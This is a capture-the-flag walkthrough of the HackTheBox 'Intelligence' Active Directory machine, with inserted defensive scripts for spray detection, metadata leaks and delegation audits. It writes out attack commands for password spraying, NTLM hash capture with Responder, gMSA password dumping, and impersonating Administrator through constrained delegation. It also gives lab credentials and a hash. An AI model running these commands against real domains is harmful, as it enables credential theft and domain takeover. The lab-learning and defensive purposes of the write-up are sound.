In this post, I would like to share a walkthrough of the Intelligence machine.


This machine is rated as Medium difficulty.

Information Gathering on Intelligence Machine


Once the VPN connection is up, we can start information gathering on the machine by running the command nmap -sC -sV -p- <IP Address> -Pn

# Nmap 7.91 scan initiated Sun Jul  4 09:05:50 2021 as: nmap -sC -sV -oA intial -Pn 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 20:19:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:28+00:00; +7h12m33s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:25+00:00; +7h12m32s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:28+00:00; +7h12m33s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:25+00:00; +7h12m32s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h12m32s, deviation: 0s, median: 7h12m31s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-04T20:19:46
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  4 09:07:55 2021 -- 1 IP address (1 host up) scanned in 125.33 seconds

From the result, we notice that the machine is an Active Directory domain controller for the domain intelligence.htb: DNS (53), Kerberos (88), LDAP/LDAPS (389, 636, 3268, 3269) and SMB (445) are all open, the LDAP certificate names the host dc.intelligence.htb, SMB signing is required, and the DC's clock is about 7 hours ahead of ours.
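The checks in the previous paragraph can be pulled out of the scan mechanically. The following script is an added example (not part of the original post) that parses an excerpt of the nmap output shown above, embedded inline so it runs offline, and reports the domain-controller indicators, whether SMB signing is enforced, and whether the measured clock skew is inside the 5-minute tolerance Kerberos allows by default (it is not here, which is why the clock has to be synchronised before any Kerberos step later on). The excerpt and the 5-minute constant are the only inputs; nothing is queried from a live host.

```python
import re

# Excerpt of the nmap output shown above, embedded here so the script runs offline.
NMAP_EXCERPT = """\
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 20:19:01Z)
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
445/tcp  open  microsoft-ds?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_clock-skew: mean: 7h12m32s, deviation: 0s, median: 7h12m31s
| smb2-security-mode:
|_    Message signing enabled and required
"""

# Kerberos rejects tickets when client and KDC clocks differ by more than
# the default tolerance of 5 minutes (KRB_AP_ERR_SKEW).
KERBEROS_MAX_SKEW_SECONDS = 300

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)", re.MULTILINE)
CN_RE = re.compile(r"commonName=([A-Za-z0-9.-]+)")
SKEW_RE = re.compile(r"clock-skew: mean: (\S+?),")
DURATION_RE = re.compile(r"^([+-]?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?$")


def parse_duration(text):
    """Convert nmap's 'XhYmZs' notation (optionally signed) into seconds."""
    m = DURATION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised duration: {text!r}")
    sign, hours, minutes, seconds = m.groups()
    total = int(hours or 0) * 3600 + int(minutes or 0) * 60 + int(seconds or 0)
    return -total if sign == "-" else total


def summarize_scan(text):
    """Pull the Active Directory indicators out of nmap output."""
    ports = {int(port): svc for port, svc in PORT_RE.findall(text)}
    cn = CN_RE.search(text)
    dc_fqdn = cn.group(1) if cn else None
    skew_match = SKEW_RE.search(text)
    skew = parse_duration(skew_match.group(1)) if skew_match else 0
    return {
        "ports": ports,
        # DNS + Kerberos + LDAP on one host is the classic domain controller signature.
        "is_domain_controller": {53, 88, 389}.issubset(ports),
        "dc_fqdn": dc_fqdn,
        # The LDAP certificate CN is the DC's FQDN; everything after the host label is the domain.
        "domain": dc_fqdn.split(".", 1)[1] if dc_fqdn and "." in dc_fqdn else None,
        "skew_seconds": skew,
        "kerberos_clock_ok": abs(skew) <= KERBEROS_MAX_SKEW_SECONDS,
        "smb_signing_required": "Message signing enabled and required" in text,
    }


if __name__ == "__main__":
    for key, value in summarize_scan(NMAP_EXCERPT).items():
        print(f"{key}: {value}")
```

Run it as a script to print the summary; the same summary is what a defender would expect an internal scan of a healthy DC to show, except that a skew this large usually means the scanning host, not the DC, is the one out of sync.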


** I’m so overly excited with this machine because I got to play with Active Directory **


We need to map the domain name intelligence.htb (and dc.intelligence.htb) to the machine's IP address in our hosts file.


Let's open the browser and go straight to the website.


The website is a plain "Intelligence" site with no login page or other links to interact with.


However, after scrolling down the page, we notice two download links.


Oh wow! One of the PDF files reveals a default password for something.


There is a way to obtain several more of the PDF files and download them to our machine. (Oh wait! I just noticed that there are more than 40 PDF files stored on the machine.)

***You can use tools to enumerate the PDF files, but I'm doing it manually***


We need to identify the PDF creators, i.e. the users who created or uploaded each document, from the files' metadata. There is a long list of names/usernames, as shown below:

Administrator
Guest
krbtgt
Danny.Matthews
Jose.Williams
Jason.Wright
Samuel.Richardson
David.Mcbride
Scott.Scott
David.Reed
Ian.Duncan
Michelle.Kent
Jennifer.Thomas
Kaitlyn.Zimmerman
Travis.Evans
Kelly.Long
Nicole.Brock
Stephanie.Young
John.Coleman
Thomas.Valenzuela
Thomas.Hall
Brian.Baker
Richard.Williams
Teresa.Williamson
David.Wilson
Darryl.Harris
William.Lee
Thomas.Wise
Veronica.Patel
Joel.Crawford
Jean.Walter
Anita.Roberts
Brian.Morris
Daniel.Shelton
Jessica.Moody
Tiffany.Molina
James.Curbow
Jeremy.Mora
Jason.Patterson
Laura.Lee
Ted.Graves

We should save those names into a single file, which I saved as user.txt in my case.
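The metadata leak above is the kind of thing a document owner should catch before publishing. The following script is an added example (not part of the original post) of that pre-publication check: it scans the document-information dictionary of a PDF for the Title, Author, Subject, Creator and Producer fields and flags any value that looks like a first.last account name. The PDF bytes are constructed inline (they are not one of the files from the machine, and the Creator value is just taken from the list above); a real check would also run the same test over XMP metadata and compressed object streams, which this raw byte scan does not decode.

```python
import re

# A minimal, constructed PDF (not one of the files from the machine) whose
# Info dictionary carries a Creator value in the first.last username style and
# an Author stored as a UTF-16BE hex string, the other encoding PDF allows.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    b"3 0 obj\n<< /Title (Internal Notice) /Creator (Jose.Williams) "
    b"/Producer (Example Writer 1.0) /Author <FEFF004A006F00730065> >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R /Info 3 0 R >>\n%%EOF\n"
)

INFO_KEYS = ("Title", "Author", "Subject", "Creator", "Producer")
# PDF text strings are either literal strings in (...) or hex strings in <...>.
FIELD_RE = re.compile(
    rb"/(" + b"|".join(k.encode() for k in INFO_KEYS)
    + rb")\s*(?:\(((?:[^()\\]|\\.)*)\)|<([0-9A-Fa-f\s]*)>)"
)
# first.last, the username convention seen in the list of names above
USERNAME_RE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")


def _decode_hex_string(hexstr):
    raw = bytes.fromhex(re.sub(rb"\s", b"", hexstr).decode("ascii"))
    if raw.startswith(b"\xfe\xff"):  # UTF-16BE with byte-order mark
        return raw[2:].decode("utf-16-be")
    return raw.decode("latin-1")


def _decode_literal_string(literal):
    # Undo the backslash escapes allowed inside literal strings.
    return re.sub(rb"\\(.)", rb"\1", literal).decode("latin-1")


def extract_info_fields(pdf_bytes):
    """Return the document-information fields found in a PDF as a dict."""
    fields = {}
    for m in FIELD_RE.finditer(pdf_bytes):
        key = m.group(1).decode()
        if m.group(3) is not None:
            fields[key] = _decode_hex_string(m.group(3))
        else:
            fields[key] = _decode_literal_string(m.group(2))
    return fields


def find_username_leaks(fields):
    """Fields whose value looks like a first.last account name."""
    return {k: v for k, v in fields.items() if USERNAME_RE.match(v)}


if __name__ == "__main__":
    info = extract_info_fields(SAMPLE_PDF)
    print("metadata:", info)
    print("possible account names:", find_username_leaks(info))
```

Authoring tools write the Creator and Author fields from the logged-in user by default, which is why an Active Directory username convention ends up in published documents; stripping those fields (or setting them to a generic value) before upload is the fix.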

Enumerate the machine with crackmapexec


We can easily determine which user the password we found earlier belongs to by spraying it across the whole user list with the command crackmapexec smb <ip> -u <filename> -p <password that we found earlier>


** You can download crackmapexec over here


After a while, I determined that Tiffany.Molina is the user whose password it is.
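From the domain controller's side, the spray in the previous step looks like one source address failing against many different accounts within seconds, followed by a success for the one account whose password matched. The following script is an added example (not part of the original post) of detection logic for that pattern, run over constructed authentication events in a simplified "timestamp, event ID, source, account" shape rather than real Security-log records (4625 is the Windows failed-logon event, 4624 the successful one). A source that fails against five or more distinct accounts inside a five-minute window is flagged, and any account that then logs on successfully from the same source in that window is listed, since that is the alert worth escalating.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events (not logs from the machine) in the shape a SIEM would return
# from a domain controller's Security log: timestamp, event ID, source IP, account.
SAMPLE_EVENTS = """\
2021-07-04T20:19:01Z 4625 10.10.14.5 Danny.Matthews
2021-07-04T20:19:01Z 4625 10.10.14.5 Jose.Williams
2021-07-04T20:19:02Z 4625 10.10.14.5 Jason.Wright
2021-07-04T20:19:02Z 4625 10.10.14.5 Samuel.Richardson
2021-07-04T20:19:03Z 4625 10.10.14.5 David.Mcbride
2021-07-04T20:19:03Z 4625 10.10.14.5 Scott.Scott
2021-07-04T20:19:04Z 4624 10.10.14.5 Tiffany.Molina
2021-07-04T20:25:00Z 4625 10.10.14.9 Laura.Lee
2021-07-04T20:25:30Z 4625 10.10.14.9 Laura.Lee
2021-07-04T20:26:00Z 4624 10.10.14.9 Laura.Lee
"""

WINDOW = timedelta(minutes=5)
MIN_DISTINCT_ACCOUNTS = 5  # one password against many accounts is the spray signature


def parse_events(text):
    events = []
    for line in text.splitlines():
        ts, event_id, source, account = line.split()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(event_id),
            "source": source,
            "account": account.lower(),
        })
    return events


def detect_sprays(events, window=WINDOW, min_accounts=MIN_DISTINCT_ACCOUNTS):
    """Flag sources that fail against many distinct accounts inside one window.

    A spray keeps the failure count per account low (no lockout) while the
    distinct-account count per source climbs, so the detection keys on the
    source, not the account. A success from the same source inside the window
    means the spray found a valid password.
    """
    by_source = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_source[ev["source"]].append(ev)

    alerts = []
    for source, evs in by_source.items():
        failures = [e for e in evs if e["event_id"] == 4625]
        for i, first in enumerate(failures):
            window_end = first["time"] + window
            accounts = {e["account"] for e in failures[i:] if e["time"] <= window_end}
            if len(accounts) < min_accounts:
                continue
            successes = [
                e["account"] for e in evs
                if e["event_id"] == 4624 and first["time"] <= e["time"] <= window_end
            ]
            alerts.append({
                "source": source,
                "started": first["time"].isoformat(),
                "distinct_accounts_failed": len(accounts),
                "accounts_succeeded_after": successes,
            })
            break  # one alert per source; later sub-windows would only repeat it
    return alerts


if __name__ == "__main__":
    for alert in detect_sprays(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The second source in the sample (two failures then a success for a single account) is a user mistyping a password and is correctly left alone; per-account lockout thresholds never fire on the real spray, which is exactly why the per-source view is needed.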


Let's access the SMB "Users" share with Tiffany.Molina's credentials by running the command smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina


We find the user flag in the \Tiffany.Molina\Desktop\ directory.


However, smbclient has no type command to read the flag directly; there are a couple of ways to read the user flag from here:

  • more user.txt (views the file from within smbclient)
  • get user.txt (downloads the file to our machine)

We can now read the user flag and paste it into the HTB Submit Flag field.

Escalate to Root Privileges Access


We need to add a DNS record pointing at our machine using dnstool, as shown in the screenshot above.


For those who don't have the tool, you can download dnstool over here


To capture the NTLM hashes shown above, you need to run the command "sudo responder -I tun0 -A"


We should copy-paste the NTLMv2 hash into a new file (any name is fine).


Once we have a password for Ted.Graves, we can use those credentials to dump the gMSA password hash (for svc_int$, used in the next step) by running the command python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'


Kerberos requires our clock to be within a few minutes of the DC's (the scan showed a skew of over 7 hours), so you need to sync the time by executing the command sudo ntpdate <machine IP>


We then run the command impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator to get a ticket for Administrator, saved as Administrator.ccache
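The root path above rests on two directory settings: a user (Ted.Graves) who is allowed to read the gMSA password of svc_int$, and svc_int$ being trusted for constrained delegation to a service on the DC while the Administrator account is not protected from being delegated. The following script is an added example (not part of the original post, and not an export from the machine) of the audit a defender would run to surface exactly that combination. It works over a constructed snapshot of the attributes involved, modelled on the relationships this walkthrough uses; the group name gmsa-readers and the second admin account are hypothetical, while the userAccountControl bit values are the real ADS_UF_* constants.

```python
UF_NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed snapshot (not an export from the machine). Keys are sAMAccountNames;
# a "members" list marks a group. "gmsa-readers" and "jose.williams" being a
# protected admin are hypothetical values chosen to exercise both audit paths.
SAMPLE_DIRECTORY = {
    "svc_int$": {
        "userAccountControl": UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
        "msDS-AllowedToDelegateTo": ["WWW/dc.intelligence.htb"],
        "msDS-GroupMSAMembership": ["gmsa-readers"],  # who may retrieve the managed password
    },
    "gmsa-readers": {"members": ["ted.graves"]},
    "ted.graves": {"userAccountControl": 0, "memberOf": ["gmsa-readers"]},
    "administrator": {"userAccountControl": 0, "memberOf": ["Domain Admins"]},
    "jose.williams": {
        "userAccountControl": UF_NOT_DELEGATED,
        "memberOf": ["Domain Admins", "Protected Users"],
    },
}


def expand_members(directory, name, seen=None):
    """Resolve a principal (user or nested group) to the users it grants access to."""
    if seen is None:
        seen = set()
    if name in seen:          # guard against circular group membership
        return set()
    seen.add(name)
    entry = directory.get(name, {})
    if "members" not in entry:
        return {name}
    users = set()
    for member in entry["members"]:
        users |= expand_members(directory, member, seen)
    return users


def audit_delegation(directory):
    """List every account with constrained delegation rights and who can obtain its secret."""
    findings = []
    for name, entry in directory.items():
        targets = entry.get("msDS-AllowedToDelegateTo", [])
        if not targets:
            continue
        readers = set()
        for principal in entry.get("msDS-GroupMSAMembership", []):
            readers |= expand_members(directory, principal)
        uac = entry.get("userAccountControl", 0)
        findings.append({
            "account": name,
            "delegates_to": targets,
            "protocol_transition": bool(uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION),
            "password_readable_by": sorted(readers),
        })
    return findings


def impersonable_privileged_accounts(directory):
    """Privileged users that a delegating service could still impersonate.

    Either the NOT_DELEGATED bit or Protected Users membership makes the KDC
    refuse to issue service tickets on the user's behalf; privileged accounts
    with neither are exposed to any service whose delegation rights and
    password are compromised together, which is the chain used on this machine.
    """
    exposed = []
    for name, entry in directory.items():
        groups = set(entry.get("memberOf", []))
        if not groups & PRIVILEGED_GROUPS:
            continue
        sensitive = bool(entry.get("userAccountControl", 0) & UF_NOT_DELEGATED)
        if not sensitive and "Protected Users" not in groups:
            exposed.append(name)
    return sorted(exposed)


if __name__ == "__main__":
    for finding in audit_delegation(SAMPLE_DIRECTORY):
        print("delegation:", finding)
    print("impersonable privileged accounts:", impersonable_privileged_accounts(SAMPLE_DIRECTORY))
```

The two findings point at the two fixes: trim msDS-GroupMSAMembership on the gMSA to the computers that actually run the service, and mark every privileged account as sensitive (or put it in Protected Users) so delegation cannot be used to act as it.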


Next, we need to execute the command export KRB5CCNAME=Administrator.ccache so that the tools pick up the ticket cache.


We can then read the root flag by running impacket-atexec -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'


In the screenshot above, I forgot to insert the closing ' at the end of the command, which is why I could not read the root flag.


I re-tried the command as above and it works!


-THE END-


Happy Learning Guys!